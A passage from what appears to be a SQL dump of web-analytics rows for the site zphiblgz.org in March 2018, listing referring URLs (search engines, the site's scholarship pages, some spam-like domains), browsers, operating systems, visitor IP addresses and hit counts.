ttps://zphiblgz.org','Chrome','Linux','23.0.1271.64','','35.176.230.234','000',2,0),(27784,'2018-03-29','https://zphiblgz.org','Firefox','Windows','7.0.1','','208.80.194.32','000',1,0),(27785,'2018-03-29','https://zphiblgz.org','Unknown','Unknown','Unknown','','137.226.113.26','000',2,0),(27786,'2018-03-29','https://zphiblgz.org','Firefox','Windows','7.0.1','','208.80.194.28','000',1,0),(27787,'2018-03-30','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.29','000',1,0),(27788,'2018-03-30','https://zphiblgz.org','Firefox','Windows','3.6.18','','208.80.194.28','000',1,0),(27789,'2018-03-30','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.28','000',1,0),(27790,'2018-03-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','137.226.113.27','000',2,0),(27791,'2018-03-30','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.32','000',1,0),(27792,'2018-03-30','https://zphiblgz.org','Chrome','Macintosh','11.0.696.68','','208.80.194.32','000',1,0),(27793,'2018-03-30','https://med-dopomoga.com/','Opera','Windows','9.00','','178.137.86.152','000',3,0),(27794,'2018-03-30','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1743.bHat0PYb4-tMufL58zoqPDx_mgSeHV_Z53OfdHqVz_hU0WVUptIAdnQv4pXXOEY2.cdff5522ce27d7b1db93dc8c4ded3d9154f10797&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YMkOSpatjLUqgxH-XWLwn-g&data=UlNrNmk5WktYejR0eWJFYk1LdmtxbWRZV3NFNHRmNnExb3UyMXhSdTBLVXZiU2tYRDJ5S04wV181cWZBQ296N0hnR0lubXFBT3NhaXJtS0s5WjlxOENFdmV5WHNTNFNBR1ZJMVoxQ2J4cEk&b64e=2&sign=89c5f757e680935c7cc08eecfde6f4ab&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQYuwSQLovbTTw71bZjtUcH9mZ3PMXKnRb6Et57Cy8mua1oSAtOE-kuIts4kuVqR_nhlDv7-uS5HV7PWWH49JC-irkFbSE6EzDV2lNSSPbVthY804U2Sp1o5XdY7GAZKvQxaLJQWzLQQf&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCW5ri5MzTNSEhWztg-Yw2dj2hQr3_rAxYPIfsLBziK0S_QqZcmT9weHyZ6s4_qsofWnhwDA4l8stQsmsnGZKHgb&l10n=ru&cts=1522391013928&mc=7.49899479291','MSIE','Windows','10.0','','95.27.143.72','000',1,0),(27795,'2018-03-30','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1743.bHat0PYb4-tMufL58zoqPDx_mgSeHV_Z53OfdHqVz_hU0WVUptIAdnQv4pXXOEY2.cdff5522ce27d7b1db93dc8c4ded3d9154f10797&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YMkOSpatjLUqgxH-XWLwn-g&data=UlNrNmk5WktYejR0eWJFYk1LdmtxbWRZV3NFNHRmNnExb3UyMXhSdTBLVXZiU2tYRDJ5S04wV181cWZBQ296N0hnR0lubXFBT3NhaXJtS0s5WjlxOENFdmV5WHNTNFNBR1ZJMVoxQ2J4cEk&b64e=2&sign=89c5f757e680935c7cc08eecfde6f4ab&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQYuwSQLovbTTw71bZjtUcH9mZ3PMXKnRb6Et57Cy8mua1oSAtOE-kuIts4kuVqR_nhlDv7-uS5HV7PWWH49JC-irkFbSE6EzDV2lNSSPbVthY804U2Sp1o5XdY7GAZKvQxaLJQWzLQQf&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCW5ri5MzTNSEhWztg-Yw2dj2hQr3_rAxYPIfsLBziK0S_QqZcmT9weHyZ6s4_qsofWnhwDA4l8stQsmsnGZKHgb&l10n=ru&cts=1522391013928&mc=7.49899479291','MSIE','Windows','10.0','','188.32.46.249','000',1,0),(27796,'2018-03-30','https://vzube.com/','MSIE','Windows','6.0','','178.137.86.152','000',4,0),(27797,'2018-03-30','https://zphiblgz.org','Firefox','Windows','3.6.23','','208.80.194.32','000',1,0),(27798,'2018-03-30','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.28','000',1,0),(27799,'2018-03-30','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.28','000',1,0),(27800,'2018-03-30','https://beachtoday.ru/','MSIE','Windows','5.0','','5.248.253.101','000',3,0),(27801,'2018-03-30','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1742.TXUGy7yLUWVIiJr0ApRZKWyZwNk0gTj6uic94Jb4uV4.b923e01e36bfc03d004b2729f356ad0a16226521&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043SW44YWlKVjRPRFJ4WVNibWpnbUxwVDJPUjJETk9QbzZvMUdIc2NQVHpIdyws&sign=096d6cc5425dd5675a5086c68a768141&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','188.166.105.53','000',2,0),(27802,'2018-03-30','https://zphiblgz.org','Firefox','Macintosh','58.0','','71.244.140.169','000',3,0),(27803,'2018-03-30','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.32','000',2,0),(27804,'2018-03-30','https://office2web.com/','Unknown','Unknown','Unknown','','134.249.55.53','000',1,0),(27805,'2018-03-30','https://zphiblgz.org','ok','Unknown','3.2.0','','112.5.248.223','000',1,0),(27806,'2018-03-30','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1743.5JTiOxaZO4TrKaTEdl4U_UMGIhyVr5FeqW91Skggh97IG9wQLRDYr9lllFpGBKWc.3a688256caf11b3c56b7eb06f4c70d10d4b4ab55&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YGftRg9cP1erjBfVTUcXDXk&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV2REMmNVN0R2VGlkcHlQZDNhNHZYVXhWY0R1OEQ2TFFLXzR4MHhMRkZjcG9RbThWQWVldTdEU001TmVpQzNZams1RVM2SHNyTS1NQQ&b64e=2&sign=3f819ca7b96b229387bc9d243dc94935&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQYuwSQLovbTTwrtZgWw2tRw4ArLovQBuaNXiD41oNV9iyJbrrF4Ral_oIqgwwF_OntyJc0puyc5yScCQ9mubWU0WMiK8W7yREk7tpFITkniJ7QXGD0NnxLW7wrB4Swn3gkMKsBefdKxp&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCWbgDHRNa-0yukkWUSeeL42oH4ZrHcjed68O_e5mSAH7kTKNCPpVxdKfYaFFoj8LTr4DwklxnOtSQ&l10n=ru&cts=1522410703336&mc=6.80583394284','MSIE','Windows','8.0','','176.14.227.205','000',1,0),(27807,'2018-03-30','http://site.ru','Chrome','Windows','5.0.375.99','','109.75.172.166','000',1,0),(27808,'2018-03-30','https://zphiblgz.org','Chrome','Windows','60.0.3112.90','','86.107.110.217','000',1,0),(27809,'2018-03-30','https://zphiblgz.org','Chrome','Windows','60.0.3112.90','','178.20.55.16','000',1,0),(27810,'2018-03-30','http://site.ru','Chrome','Windows','5.0.375.99','','91.250.96.122','000',2,0),(27811,'2018-03-30','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1742.xlsZOEEHm0VtTDD_AsRcEN8quK7wdpiiE0wiSIIPomo.0c73d3b0230c62b8e7467f181ac27d3be578423a&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043YWxmd3NIalp4bEVIUHZxVUJPQUdzUXA1Zy1YY2pHOFJUY2FmTGZSbVotdyws&sign=4db203405104c3aa4cb729773b124e15&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','54.255.246.235','000',2,0),(27812,'2018-03-30','https://zphiblgz.org','Safari','Macintosh','11.1','','96.234.210.118','000',24,0),(27813,'2018-03-30','https://zphiblgz.org/scholarship/','Chrome','Windows','64.0.3282.186','','73.173.254.31','000',2,0),(27814,'2018-03-30','https://zphiblgz.org','Firefox','Windows','54.0','','71.244.251.220','000',3,0),(27815,'2018-03-30','http://www.zphibmaryland.org/chapters/','Safari','iPhone','11.0','','73.132.168.71','000',5,0),(27816,'2018-03-30','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1742.N0uUcmAWIWfHRQVYxrho1wSFM-Ypda6xEah3KG1tGO4.15468660bb0f55737abf217a385af7d045389e56&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042UGdIbTk0S1MwNUItd3NrMHpPdy1NRDlqUUREV1gtaEZuaEp3UmRtSVVpdyws&sign=fc2e60b1f3c8be4d8392854021a1b9d9&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','165.227.35.92','000',2,0),(27817,'2018-03-30','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1742.n_1ZyXU2IhpNm41KTenBKzk3H3Nyq8hI07l0OqeAbAw.98979d9e6fe8a678d12eb38f653898560f40f64a&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043SlBNX0thT0J0QnhZeUZrMHZBTWR5Nmo1UDM0LUprUEVjbndRSk9Rc1NGQSws&sign=02760358a87e49d649464353b2e0d9d4&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','162.243.34.58','000',2,0),(27818,'2018-03-30','https://zphiblgz.org','MSIE','Windows','11.0','','161.69.99.11','000',4,0),(27819,'2018-03-30','https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=6&ved=0ahUKEwiDvbv_sZTaAhXQx1kKHe5qDDEQFgg9MAU&url=https%3A%2F%2Fzphiblgz.org%2Fts_teams%2Fjeaneathia-yerby-crowder%2F&usg=AOvVaw2CzounTUWYQqtBq-Aj7v1i','MSIE','Windows','11.0','','134.192.176.2','000',2,0),(27820,'2018-03-30','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1742.FbjBChH4nuAjCNEM0GMIvbvHlKpm9y5Aj4xBqzio_qs.d2d7028a6871ed79f9fdfd09ef152cadac61f980&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041TmZXclJwcDhxcnpDQmsxdE1PbURkaFlzcnA2R253elh1NWZQY1g2X1U1USws&sign=fd59797a0fafaad9bcadb1fba17d02f7&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','138.68.94.227','000',2,0),(27821,'2018-03-30','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1742.eYpbcEBZoOXBnpGBjI75LywjAQ3LCmkcWvrcGtT1Juc.1b7844ca49914c20188e6d1b46e06f2bc96f005d&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042Mk1zRnNsRXF5WlZMWHBTQkZoelNsVTBTNEQybXRjVGp2eVlremQ1LTZnUSws&sign=1786eb746cb4c5d1054044c2d4ae255b&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','47.91.220.205','000',2,0),(27822,'2018-03-30','http://site.ru','Chrome','Windows','5.0.375.99','','67.227.157.7','000',4,0),(27823,'2018-03-30','https://www.google.com/','Chrome','Macintosh','58.0.3029.110','','45.3.77.179','000',2,0),(27824,'2018-03-30','http://www.zphibmaryland.org/chapters/','Chrome','Windows','65.0.3325.181','','69.195.247.116','000',5,0),(27825,'2018-03-30','https://www.google.com/','Safari','Macintosh','11.0.3','','96.244.229.165','000',10,0),(27826,'2018-03-30','http://site.ru','Chrome','Windows','5.0.375.99','','151.80.199.98','000',2,0),(27827,'2018-03-30','https://zphiblgz.org','Safari','iPhone','11.0','','166.137.240.126','000',2,0),(27828,'2018-03-30','http://zphiblgz.org/scholarship/','Safari','iPhone','11.0','','107.77.202.115','000',1,0),(27829,'2018-03-30','https://zphiblgz.org','Firefox','Windows','7.0.1','','208.80.194.31','000',1,0),(27830,'2018-03-30','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.31','000',1,0),(27831,'2018-03-30','https://zphiblgz.org','Firefox','Windows','56.0','','204.126.132.241','000',2,0),(27832,'2018-03-30','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1742.-J8pYaiOfEfjAemYsecCC5OznuqrYKHPqzkSNEA4kGE.635e355238607c7a10d52f6d4f6b1ba4de2389ea&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043QWgyV3ctZHhrSVdEMmtVNi1fU2ZvSEYxQXVBUnZxRWdzcHJUanhtMHRrdyws&sign=16074b82a141cdff0bde6f3a18c2276b&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','138.68.188.16','000',2,0),(27833,'2018-03-30','http://site.ru','Chrome','Windows','5.0.375.99','','147.135.199.192','000',2,0),(27834,'2018-03-30','https://outlook.live.com/','Chrome','Windows','65.0.3325.181','','96.244.195.93','000',10,0),(27835,'2018-03-30','https://zphiblgz.org','Chrome','Windows','57.0.2987.133','','40.107.234.72','000',1,0),(27836,'2018-03-30','https://zphiblgz.org/scholarship/application/?gf_token=049ef8d997014b4eb180a0f595d2b7c2','Chrome','Windows','57.0.2987.133','','40.107.234.63','000',1,0),(27837,'2018-03-30','https://zphiblgz.org','Chrome','Windows','57.0.2987.133','','40.107.234.13','000',1,0),(27838,'2018-03-30','https://zphiblgz.org/scholarship/application/?gf_token=049ef8d997014b4eb180a0f595d2b7c2','Chrome','Windows','57.0.2987.133','','40.107.234.77','000',1,0),(27839,'2018-03-30','http://m.facebook.com','AppleWebKit','iPhone','604.5.6','','69.251.214.44','000',1,0),(27840,'2018-03-30','https://zphiblgz.org/scholarship/','Safari','iPhone','11.0','','96.244.229.165','000',8,0),(27841,'2018-03-30','http://veselokloun.ru/','MSIE','Windows','6.0','','46.119.121.22','000',2,0),(27842,'2018-03-30','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.186','000',4,0),(27843,'2018-03-30','https://zphiblgz.org','Opera','Windows','8.01','','208.80.194.32','000',1,0),(27844,'2018-03-30','https://zphiblgz.org','Safari','iPhone','11.0','','71.179.18.125','000',1,0),(27845,'2018-03-30','https://zphiblgz.org','MSIE','Windows','11.0','','172.82.185.210','000',2,0),(27846,'2018-03-30','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.212','000',2,0),(27847,'2018-03-30','http://svetka.info/','MSIE','Windows','6.0','','46.118.127.172','000',7,0),(27848,'2018-03-30','https://zphiblgz.org','Chrome','Macintosh','64.0.3282.167','','184.94.240.92','000',1,0),(27849,'2018-03-30','https://www.google.com/','Safari','iPhone','11.0','','73.172.250.16','000',12,0),(27850,'2018-03-30','https://zphiblgz.org','Safari','iPhone','11.0','','71.121.248.185','000',3,0),(27851,'2018-03-30','https://zphiblgz.org','Chrome','Windows','12.0.742.91','','208.80.194.32','000',1,0),(27852,'2018-03-30','https://zphiblgz.org','Firefox','Windows','4.0.1','','208.80.194.32','000',1,0),(27853,'2018-03-30','https://docsportal.net/','MSIE','Windows','6.0','','134.249.55.53','000',2,0),(27854,'2018-03-30','https://zphiblgz.org/scholarship/application/?gf_token=f59c0852f6e8420aa51aef021fccde55','Chrome','Windows','65.0.3325.162','','73.200.187.175','000',1,0),(27855,'2018-03-30','http://site.ru','Chrome','Windows','5.0.375.99','','5.61.248.2','000',2,0),(27856,'2018-03-30','https://zphiblgz.org/scholarship/','Safari','iPhone','7.0','','131.253.27.98','000',1,0),(27857,'2018-03-30','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.29','000',1,0),(27858,'2018-03-30','https://zphiblgz.org','Chrome','Macintosh','64.0.3282.186','','71.179.18.125','000',9,0),(27859,'2018-03-30','https://www.google.com/','Firefox','Windows','58.0','','96.244.229.165','000',8,0),(27860,'2018-03-30','https://www.google.com/url?q=https://zphiblgz.org/scholarship/application/?gf_token%3D2cb6161c37884f548e1355993249cdff&source=gmail&ust=1522457256164000&usg=AFQjCNHZFxd0I0TXAsHTo-gr0TgtXjiAtg&sa=D','Safari','iPhone','11.0','','71.166.46.215','000',2,0),(27861,'2018-03-30','https://zphiblgz.org','Chrome','Windows','65.0.3325.181','','71.166.46.215','000',6,0),(27862,'2018-03-30','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.31','000',1,0),(27863,'2018-03-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','50.87.144.56','000',1,0),(27864,'2018-03-30','http://www.bing.com/search?q=ms+walk+2018&form=MSNH14&sc=8-4&sp=-1&qs=n&sk=','MSIE','Windows','9.0','','204.79.180.7','000',1,0),(27865,'2018-03-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','185.38.44.162','000',1,0),(27866,'2018-03-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','112.213.89.117','000',1,0),(27867,'2018-03-30','https://zphiblgz.org','Chrome','Windows','65.0.3325.146','','107.6.171.134','000',1,0),(27868,'2018-03-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','50.87.144.55','000',1,0),(27869,'2018-03-30','https://zphiblgz.org','Edge','Windows','16.16299','','96.244.50.179','000',8,0),(27870,'2018-03-30','http://zphiblgz.org/','Chrome','Windows','32.0.1700.102','','195.22.125.74','000',3,0),(27871,'2018-03-30','http://site.ru','Chrome','Windows','5.0.375.99','','103.67.235.59','000',1,0),(27872,'2018-03-30','https://www.google.com/','Chrome','Windows','65.0.3325.181','','98.199.253.124','000',4,0),(27873,'2018-03-30','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','54.183.165.74','000',1,0),(27874,'2018-03-30','https://zphiblgz.org','Chrome','Macintosh','14.0.835.202','','208.80.194.30','000',1,0),(27875,'2018-03-30','http://site.ru','Chrome','Windows','5.0.375.99','','184.168.200.161','000',1,0),(27876,'2018-03-30','https://www.google.com/','Chrome','Macintosh','65.0.3325.181','','73.5.24.139','000',2,0),(27877,'2018-03-30','https://zphiblgz.org','Chrome','Windows','64.0.3282.186','','76.106.122.110','000',8,0),(27878,'2018-03-30','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.208','000',1,0),(27879,'2018-03-30','https://zphiblgz.org','Firefox','Windows','3.6.23','','208.80.194.35','000',1,0),(27880,'2018-03-30','https://zphiblgz.org','Firefox','Linux','3.6.13','','208.80.194.35','000',1,0),(27881,'2018-03-30','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','35.177.95.179','000',2,0),(27882,'2018-03-30','http://game300.ru/','MSIE','Windows','5.5','','46.119.121.22','000',1,0),(27883,'2018-03-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','150.95.136.181','000',2,0),(27884,'2018-03-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','133.130.110.103','000',2,0),(27885,'2018-03-31','https://zphiblgz.org','Safari','iPhone','11.0','','96.244.229.165','000',9,0),(27886,'2018-03-31','https://zphiblgz.org','MSIE','Windows','9.0','','204.79.180.4','000',1,0),(27887,'2018-03-31','https://zphiblgz.org/scholarship/application/','Firefox','Windows','58.0','','96.244.229.165','000',4,0),(27888,'2018-03-31','http://site.ru','Chrome','Windows','5.0.375.99','','62.109.26.221','000',1,0),(27889,'2018-03-31','https://zphiblgz.org','Firefox','Windows','3.6.18','','208.80.194.31','000',1,0),(27890,'2018-03-31','https://zphiblgz.org','MSIE','Windows','9.0','','204.79.180.15','000',1,0),(27891,'2018-03-31','http://site.ru','Chrome','Windows','5.0.375.99','','88.99.162.86','000',1,0),(27892,'2018-03-31','https://zphiblgz.org','Chrome','Windows','65.0.3325.146','','198.143.155.139','000',1,0),(27893,'2018-03-31','https://www.zphiblgz.org:443/','Chrome','Windows','65.0.3325.146','','198.143.155.140','000',1,0),(27894,'2018-03-31','https://zphiblgz.org','Firefox','Windows','3.6.13','','208.80.194.31','000',1,0),(27895,'2018-03-31','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.31','000',1,0),(27896,'2018-03-31','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1744.RyaetfqrRjrs1spD2L0HgKb8y1phC28Z9RTtV-Fx9iny3tnCUeDJmRy2D8FO1AOF.91cd4d7550958795c929a13f9fce5d0b032ef0fe&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YG-XUIUpxKrkaoPisARVvB8&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV2REMmNVN0R2VGlScUpyYXUwQXliQmpUMlFSODVWdmN3OUsyUENoUXFlT2YxSmxUUENnQ2NrLUtjN3IwcEMtZU5TTEc1WlIxUVJYcGpjbGk0ejZpaTlOMl9EVGFjSWloZGJqRVBLLWFGMG5mOWJBR0g2STNmVQ&b64e=2&sign=164967e770e2aa0225ffb63f384e5b47&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQe3IrxbPWIv4GnCyWAHrrRLvQcrzygxqor8jM7GUd5u0ylVVUokNxflELqPlLA0gXSfvz2ti7c4RM8TFk29Ga_SRYn48hgwH-fYfM6SWPa2S2MpFkhPXgV1ocpnpNdo4lAXsA67ya55o&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCW8s5kfnNkNjzNT4lVPbeyaKdQBrsP_Cj9b_6iQzcOgnK3WHSq4QiwMu_RKLy3QtfvSG8p5qprZiA&l10n=ru&cts=1522483043483&mc=1.55112803787','MSIE','Windows','8.0','','176.14.34.104','000',1,0),(27897,'2018-03-31','https://zphiblgz.org','MSIE','Windows','9.0','','204.79.180.2','000',1,0),(27898,'2018-03-31','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1743.wfYBq1-QbDWNwSHUJwA0sXiRXMI5HEvyJU3Z1FyU-k4.5d095c2998f8841344855666acd1ac4e60be9a03&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041WlhUSVlJZzBERzltWWJQTzUxa3d6NEJtWjludEY1NkduU2ZrVGRUWDd4QSws&sign=af57b1e41d22088445bd945e563a2bf8&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','192.241.246.71','000',2,0),(27899,'2018-03-31','http://site.ru','Chrome','Windows','5.0.375.99','','80.249.171.72','000',1,0),(27900,'2018-03-31','http://zphiblgz.org/','Trident','Unknown','5.0','','180.153.236.51','000',2,0),(27901,'2018-03-31','https://zphiblgz.org/','Trident','Unknown','5.0','','180.153.236.11','000',1,0),(27902,'2018-03-31','http://site.ru','Chrome','Windows','5.0.375.99','','174.37.241.142','000',1,0),(27903,'2018-03-31','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1743.OFGgjidUHPGUvADIPLYo1Lc7Jz-niFKrnb_5Ag3fgvQ.ac944288d186f8e7d7d50c738213bb9e0c6fdfed&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041N0NiYkxwblkwOGhHaDlOZGNqeXI2N2NLakJBQlY4R1Z3MHlJMWZKdFpXZyws&sign=ff441185bba3cdf27181419bae01e580&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','139.59.122.69','000',2,0),(27904,'2018-03-31','https://zphiblgz.org/','Safari','Macintosh','11.0.2','','164.132.51.5','000',1,0),(27905,'2018-03-31','https://zphiblgz.org','Firefox','Windows','3.6.23','','208.80.194.31','000',1,0),(27906,'2018-03-31','https://zphiblgz.org/scholarship/application/','Safari','iPhone','11.0','','99.203.17.242','000',5,0),(27907,'2018-03-31','http://site.ru','Chrome','Windows','5.0.375.99','','202.218.119.118','000',2,0),(27908,'2018-03-31','https://zphiblgz.org','Chrome','Macintosh','62.0.3202.89','','104.131.19.168','000',3,0),(27909,'2018-03-31','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1743.0W0TZBp7CVFlIWMdqYDU4SMRfDfrS9id2KYP1AXfvHY.03f418872bc9805f6e10dbbfb9b2d60533c047e4&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043b2d1aEFkUUhFdUpPMTdOWFdMMWRueVkxR1ZFZ0NWSGxmdjRLTDdrZWNUdyws&sign=eb824666960624dc8f20393185fc7697&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','47.91.220.205','000',2,0),(27910,'2018-03-31','https://www.google.com/','Safari','iPhone','604.1','','96.244.204.238','000',2,0),(27911,'2018-03-31','https://zphiblgz.org/scholarship/','Edge','Windows','16.16299','','73.173.97.121','000',9,0),(27912,'2018-03-31','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1743.pjQWFSVMvYB0rcAMpGxWIOROh4b5UL4VSrOZRXGXkVM.530f3fb062107fad91f8fedeed1efcac16d603be&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043NVZfWjhFRVVZNVdmZGwyRTNHc0VPNjVRVTN1TC1Cb2Voc1IxZDFSU1lRdyws&sign=7ed32c34be4e275d4597865386cebd92&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','165.227.234.17','000',2,0),(27913,'2018-03-31','https://zphiblgz.org','AppleWebKit','Windows','534','','40.77.167.32','000',1,0),(27914,'2018-03-31','https://outlook.live.com/','Chrome','Windows','65.0.3325.181','','96.244.204.238','000',12,0),(27915,'2018-03-31','https://zphiblgz.org','SamsungBrowser','Android','7.0','','172.58.216.22','000',8,0),(27916,'2018-03-31','https://zphiblgz.org','Safari','Macintosh','11.0.3','','71.179.81.192','000',6,0),(27917,'2018-03-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','54.236.1.14','000',1,0),(27918,'2018-03-31','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1743.HRyMlYhMyahw0cwUJ3z81KQOiB-1dK66i6Y8ZQ63hYU.e0917999efe9851648bf2686b4e2b64b80e91fc7&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040TGljTXdhUF9BRlBwUURaWmVjUTVWWHkyempvbzh3YmVpOThET28tNXYydyws&sign=62fe2c2d3d3ef83c9e1aa59f0b7d2fbb&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','35.182.100.100','000',2,0),(27919,'2018-03-31','https://docs4all.com/','MSIE','Windows','5.5','','134.249.55.53','000',2